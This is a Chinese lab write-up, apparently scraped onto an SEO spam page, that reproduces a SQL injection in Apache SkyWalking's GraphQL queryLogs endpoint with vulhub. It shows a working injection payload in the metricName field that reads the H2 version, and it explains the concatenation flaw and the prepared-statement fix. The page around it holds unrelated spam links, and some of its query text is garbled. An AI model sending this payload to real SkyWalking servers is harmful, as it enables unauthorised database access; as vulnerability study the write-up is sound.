当前位置: 首页 > news >正文

哪些网站用python做服务框架上海百度

哪些网站用python做服务框架,上海百度,济宁网站建设公司有哪些,太原制作网站的公司漏洞概述 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参…

漏洞概述

当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。

环境搭建

拉取vulhub

git clone https://github.com/vulhub/vulhub.git

搭建镜像

cd /vulhub/skywalking/8.3.0-sqli
docker-compose up -d

在这里插入图片描述
访问8080端口
在这里插入图片描述

漏洞复现

在首页刷新即可抓到报文。
在这里插入图片描述

输入payload

{"query":"query queryLogs($condition: LogQueryCondition) {queryLogs(condition: $condition) {totallogs {serviceIdserviceNameisErrorcontent}}
}
","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --","endpointId":"1","traceId":"1","state":"ALL","stateCode":"1","paging":{"pageSize":10}}}
}

查看返回结果
在这里插入图片描述
在这里插入图片描述

漏洞复现成功

漏洞原理

源码:https://github.com/apache/skywalking/releases/tag/v8.3.0
graphql是skywalking的一种查询协议,如果请求以下列JSON给出:

{bookById(id: "book-1"){idnamepageCountauthor {firstNamelastName}}
}

则返回结果为:

{"bookById": {"id":"book-1","name":"Harry Potter and the Philosopher's Stone","pageCount":223,"author": {"firstName":"Joanne","lastName":"Rowling"}}
}

通常,graphql中会对对象类型进行定义:

type Query {bookById(id: ID): Book
}type Book {id: IDname: StringpageCount: Intauthor: Author
}type Author {id: IDfirstName: StringlastName: String
}

此次产生漏洞的queryLogs为:
oap-server\server-query-plugin\query-graphql-plugin\src\main\resources\query-protocol\log.graphqls:
(这里不知道为什么下载的源码中没有,只能跑到github上看)
在这里插入图片描述

oap-server\server-query-plugin\query-graphql-plugin\src\main\java\org\apache\skywalking\oap\query\graphql\resolver\LogQuery.java
在这里插入图片描述

oap-server\server-storage-plugin\storage-jdbc-hikaricp-plugin\src\main\java\org\apache\skywalking\oap\server\storage\plugin\jdbc\h2\dao\H2LogQueryDAO.java
在这里插入图片描述

采取了直接拼接的方式。

5、修复方法
修复后使用了占位符,即预编译。

http://www.ds6.com.cn/news/55161.html

相关文章:

  • 网站做的不好会有什么后果深圳哪里有网络推广渠避
  • 网站创建想法二级域名免费分发
  • 栾城seo整站排名深圳今日重大新闻
  • 网站建设流程与步骤便宜的seo网络营销推广
  • 信息图表网站网络营销师课程
  • 上海公共招聘网新版seo网站优化外包
  • 怀柔网站建设推广外链工厂 外链
  • 网站建设心得正规推广平台有哪些
  • 网站登录注册怎么做重庆seo网页优化
  • 平面设计毕业设计作品赣州seo培训
  • 在服务器上布网站怎么做简述如何优化网站的方法
  • 手机网站开发 教程镇江抖音seo
  • 湖北百度关键词排名软件深圳网站搜索优化
  • 自动做PPT的网站seo推广优化服务
  • 网站怎么做移动适配自然搜索优化
  • 手机做兼职的网站设计企业培训公司
  • 站长工具端口检测站长工具seo推广 站长工具查询
  • 网站后台模板 仿cnzz最近新闻内容
  • 微信做色情网站网站优化关键词价格
  • 可以做音基题的音乐网站推销
  • 网站开发制作阶段的说课稿广告推广方案
  • 公司网站百度搜不到百度推广开户代理
  • 东丰网站建设优化防疫政策
  • 个人网站 后台管理seo团队
  • 提供常州网站建设公司seo关键字优化
  • wordpress地址和站点url东莞网站营销
  • 外贸电商网站模板成都百度推广代理公司
  • app开发哪家强广州网站优化页面
  • 湖北建设局网站首页2024年的新闻
  • 域名会跳转怎么进原网站吉林关键词优化的方法